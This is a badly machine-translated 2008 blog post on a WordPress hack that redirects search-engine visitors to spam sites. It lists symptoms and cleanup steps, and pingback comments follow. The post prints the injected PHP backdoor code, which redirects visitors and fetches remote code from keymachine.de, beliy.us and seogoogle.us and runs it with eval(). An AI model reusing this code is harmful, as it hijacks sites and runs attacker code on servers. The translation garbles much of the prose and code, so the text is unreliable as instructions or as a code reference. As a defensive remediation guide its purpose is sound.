WordPress Hack: A nota și Fix Google și Cercetare Motor sau Nu Prăjitură Trafic Redirected la spre Al tău-Needs.info, AnyResults.Net, Aur-Info.net și Alt Illegal Sites
Hackers ești care merge tot afară la spre hack și exploit WordPress blogs câmin tot încă o dată art.hot. web, plantă și injecting malicious code into WordPress codes și bază de date înăuntru ordine la spre redirect visitors și hits de la Google și alt cercetare motor la spre spam sites such as al tău-needs.info, anyresults.net, aur-info.net, keymachine.de, beliy.us, seogoogle.us și mulți alt spam sites that plin cu pay- de- pocnitură CPC ads. Niște hack apendice la spre target mai mare crowd by redirecting tot fără WordPress prăjitură. Fără been hacked, aceștia trafic supposedly la spre a sosi la art.hot. blog as destinație.
Symptoms de la Cercetare Motor Redirection Hack
Not ă that nu tot symptoms Mai fericit altogether. Acolo Mai a fi mai mult decît unul method de hacks existed, care contributed la spre different află și posibil resolution.
- Orice pocnitură gît de la cercetare motor such as Google, Yahoo, AOL, MSN, Ferestre Ficat cercetare results, a cuprinde blog nume, voință a voi a fi redirected și înainte la spre hackers’ sites such as al tău-needs.info, anyresults.net, aur-info.net, keymachine.de, beliy.us, seogoogle.us, cu art.hot. listă sure la spre grow. Privit a sosi la art.hot. hacker pagină cu art.hot. same cercetare fibros that el sau ea folosit la cercetare înăuntru cercetare motor.
- Pocnitură on un link la blog on RSS feed gata such as Google gata a putea a fi redirected la spre hacker site de asemenea.
- UN visitor cu nu socoteală pe blog, sau nu login (hence does nu has prăjitură detected by malicious code), voință a voi a fi redirected la spre spam sites.
- Unic visits de la cercetare motor ești been redirected away, și art.hot. șmecherie conducere la spre fool around probably o mulțime de bloggers, webmasters și site proprietar, sau cel puțin întîrziere art.hot. detection de la problemă.
- Sudden huge și dramatic drop și a pierde de masaj amount de visitors trafic și pagină vedere înăuntru web tractor statistics, especially trafic cu Google as referrer, seară though cercetare motor results ranking is intact.
- Masaj drop de reclamă revers de la Google AdSense sau alt ads rețea, sau affiliate commissions.
- Art.hot. a urma bază encoded PHP code Mai apendice pe wp-blog-header.php dosar:
<?php \
$serefarraygoogle,msn,live,altavista,ask,yahoo,aol,cnn,weather,alexa=("""""""""""""""""""");
$ser0=; foreachseref($ as $ref) ifstrposstrtolower_SERVERâHTTP_REFERERâ,ref((($[])$)!==false){ $ser1=”?;gustare de dimineață; }
dacă && sizeof_COOKIE0($)==){ headerLocation(”: http:/”.base64_decodeYW55cmVzdWx0cy5uZXQ.(”=”)”/”);ieșire; }? > - Un imagine, care is înăuntru fracțiune un buchet de malicious PHP code, was added la wp-contents/ încărcat sincer. Pentru example, wp-contents/ încărcat/2008/06/06/abcdefghijklmn.jpg, sau it Mai a fi interior al tău pe ei pliant, i.e. wp-contents/themes/classic/images/xyz.jpg. Art.hot. nume de la imagine Mai a fi în format de xxxxxx_old.jpeg.
- Un intrare was a insera înăuntru MySQL bază de date pentru WordPress wp_options la spre activate art.hot. imagine ( art.hot. malicious PHP code) as un dop, typically as rss_f541b3abd05e7962fcab37737f40fad8.
- Acolo Mai a fi de asemenea malicious codes, especially aceia that interpret cu eval() sau base64_decode() virgulă been a insera into alt WordPress PHP dosar. Examples ești art.hot. a urma codes:
ifisset_GET'p'(($[])) {
$șosete = @fsockopenkm20725.keymachine.de(’’, 80);
ifsock($){
fwrite ($ șosete, ‘ a lua http:/km20725.keymachine.de/ a servi/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'.=’$[]’&=’$[]’ HTTP/1.0.rn′”\\”);
fwrite ($ șosete, ‘ gazdă: km20725.keymachine.de.rnrn’”\\\\”);
whilecontent($[] = fgets ($ șosete));
$contact = implode(”, $ contact);
@evaltrimsubstrcontent((($, strposcontent($, “\rnrn\\\”))));
fclose ($ șosete);}
}ifisset_GET'p'(($[])) { @eval@file_get_contentshttp((’:/beliy.us/ a servi/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'=’$[]’&=’$[]));
}ifisset_GET'p'(($[])) { @eval@file_get_contentshttp((’:/seogoogle.us/ a servi/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'=’$[]’&=’$[]));
}evalgzinflatebase64_decode((( - WordPress pe ei aceasta este tot been activated și folosit a putea a fi injected cu hacking code și a afecta de asemenea. Such code normally exists înăuntru header.php sau index.php de la pe ei, și has un linie similar la sub
ifserâ1âł($== && sizeof_COOKIE0($)==){ headerâLocation(:
Art.hot. WordPress cercetare trafic redirect la spre spam site hack fericit probably datorie la spre sigur hole și vulnerability aceasta este tot nu patched cînd blog proprietar decides nu la spre upgrade la spre tîrziu traducere de WordPress (although niștereports that lor blogs been hacked seară though său’ already pe tîrziu traducere de WordPress 2.5.1). Whatever art.hot. veninos, aici’ art.hot. fix și solution la spre resolve și defeat art.hot. hack la spre a asigura that tu own spate art.hot. trafic și avoid been penalized by Google by unreasonable redirecting la spre spam pagină.
- Spate art.hot. WordPress bază de date.
- Folos phpMyAdmin la spre maro WordPress MySQL bază de date masă. Du-te la wp_options masă, și apoi atunci a redacta art.hot. row numit active_plugins. Art.hot. row details tot active dop that has been activated. Energie gît art.hot. listă ( înăuntru un linie), și privire pentru un un dop numit ended cu un imagine prelungire, such as .jpg, .jpeg, .gif și etc. Pentru example, abcdefgh_old.jpeg. Not ă jos art.hot. patetic la imagine dosar.
- Folosire sFTP sau SSH ( a ierta despre FTP sau Telnet pentru sigur), apoi atunci navigate la patetic de la dosar, și a șterge art.hot. dosar.
- Du-te la WordPress Administrator Dop panel, deactivate sau activate orice dop la spre clar off art.hot. malicious dop de la “active_plugins” row.
- Spate la spre phpMyAdmin, la art.hot. wp_options masă, află un row that contact art.hot. a urma fibros as option_name:
rss_f541b3abd05e7962fcab37737f40fad8A șterge art.hot. row away.
Dacă tu dont’ know cum la spre parfum art.hot. bază de date clar detailed înăuntru pas above, aici’ un vizual tutorial:
- Du-te la wp_users masă. Dacă acolo is un nameless user (null value înăuntru user_nicename field) a crea la 000000:: on 0000-00-00, not ă jos art.hot. user IDENTITATE ( identitate field, un număr). A șterge art.hot. user.
- Maro art.hot. wp_usermeta masă. A localiza tot rows cu user_id meciuri art.hot. IDENTITATE de la a șterge illegal user. Acolo ești normally trei rows been a asocia la invader user Identitate. A șterge tot art.hot. a asocia rows.
- Login la a servi la spre a redacta art.hot. pe ei dosar, sau maro art.hot. pe ei dosar’ code înăuntru Pe ei Redactor de WordPress Administrator Design panel. A verifica art.hot. header.php și index.php pentru orice suspicious code. As mentioned above, privire pentru ceva similar la linie sub:
ifserâ1âł($== && sizeof_COOKIE0($)==){ headerâLocation(:Dacă a întemeia, a șterge și remove art.hot. code. Not ă that art.hot. malicious code voință a voi a fi mai mulți linii lung înăuntru total.
- Dacă său’ nu already existed, a crea un empty index.html dosar în wp-contents/ dop sincer. Art.hot. gol index.html hides art.hot. contents de la dop sincer, efectiv shield ce dop-ins been folosit de la hackers la spre tare și închis art.hot. WordPress sigur.
- Încărcat și replace each și fiecare WordPress dosar ( nu unic wp-blog-header.php) pe a servi cu art.hot. proaspăt, clar, și origine tîrziu traducere de la WordPress (de course, except puțini dosar such as wp-config.php și pe ei). Dacă al tău’ upgrading, gata art.hot.ghid precaut.
- Scimbare al tău password.
- Dacă tu ai multiple users, scimbare lor password ( sau a intreba pe ei la spre scimbare art.hot. password) de asemenea.
import: Aceasta este o machine a traduce pagină care is provided "as is" fără warranty. Machine traducere Mai a fi difficult la spre understand. A face pe plac la refer la spreorigine Englez anghinară oricînd posibil.
Share și contribute sau a lua technical cină și ajutor laMeu Digital Viață Forums.
Relații Anghinară
- A aduna NoFollow Relații la spre WordPress Blogroll la spre Increase PageRank
- WordPress Dop: Display Google Analytics și FeedBurner Reports Statistics de la Site Admin
- Technorati Incoming Links Dop pentru WordPress
- UN Glandă La Google Merchant Cercetare
- Cum la spre Avoid, Bypass sau Escape Google Nisip
- SEO Prietenesc Rewrite Method la spre A mișca Website URL De la Subdirectory la spre Root Părinte Pliant
- Ask.com Cercetare Motor Copie by CNNMoney
- Șofer Mai mult Trafic by Folosire Imagine
- Integrate și Display Google AdSense pentru Cercetare și Co-Op Obicei Cercetare Motor Results înăuntru WordPress Blog Pagină Template
- Care Cercetare Motor is art.hot. Cel mai bun și Most Relevant?

































Iunie 12th, 2008 1006:
[...] Meu Digital Viață WordPress Hack: A nota și Fix Google și Cercetare Motor sau Nu Prăjitură Trafic Redi… [...]
Iunie 12th, 2008 1114:
[...] wersja WP 2.5.1 byĆa naraĆŒona na jakieĆ problemă. UN w caĆym tym zamieszaniu, zwanym juĆŒ Cercetare Motor Redirection Hack, chodzi o przekierowanie ruchu z wyszukiwarek, gĆĂłwnie Google, choÄ nie tylko, na specjalnie [...]
Iunie 12th, 2008 1443:
[...] WordPress Hack: A nota și Fix Google și Cercetare Motor sau Nu Prăjitură Trafic Redirected la spre Al tău-Nee… Share sau A trimite This la spre prieten Sphere: Relații ContentWant mai mult web produse de plastic copie? Apoi atunci a face sure tu a subscrie la spre our RSS feed sau a lua our customizable widget și embed it on al tău site! Relații post WordPress art.hot. most folosit deschidere acru blog produse de plastic[...]
Iunie 12th, 2008 1940:
[...] Kalau peringkat blog WordPress kita di Google tetap untuk keyword kita, tapi pengunjung turun drastis, hati-hati, bisa jadi itu artinya blog kita kena hack dan di redirect ke situs spam. [...]
Iunie 13th, 2008 1200:
[...] Meu Digital Viață WordPress Hack: A nota și Fix Google și Cercetare Motor sau Nu Prăjitură Trafic Redi… [...]
Iunie 13th, 2008 1336:
[...] WordPress Hack: A nota și Fix Google și Cercetare Motor sau Nu Prăjitură Trafic Redirected Meu Digital… WordPress Hack: A nota și Fix Google și Cercetare Motor sau Nu Prăjitură Trafic Redirected la spre Al tău-Needs.info, AnyResults.Net, Aur-Info.net și Alt Illegal Sites Ă» Meu Digital Viață (tags: wordpress sigur) [...]
Iunie 18th, 2008 2208:
[...] Meu Digital Viață WordPress Hack: A nota și Fix Google și Cercetare Motor sau Nu Prăjitură Trafic Redi… [...]
Iulie 3rd, 2008 0308:
[...] ca sa-mi dau sema jos e buba, daca nu mi-ar fi spus Eugen intr-o a discuta la cafenea, ca un gasit un link pe Google si ar fi bine sa-l vad. MyDigitalLife.info, au publicație un anghinară cu titlu : [...]
Iulie 15th, 2008 0810:
[...] I caught it timpuriu on și made sure la spre remove tot art.hot. malicious code. Aici este meu drăguț tutorial on cum la spre clar al tău site dacă this were la spre fericit la spre[...]
Iulie 17th, 2008 1030:
[...] WordPress Hack: A nota și Fix Google și Cercetare Motor sau Nu Prăjitură Trafic Redirected la spre Al tău-Nee…. [...]
Iulie 25th, 2008 0949:
[...] avere una merda a veni quella tra le manichiură siete già stare infestati o pensie di esserlo, qui e qui troverete le specifiche dellexploit’ e alcuni a considera utilitate de[...]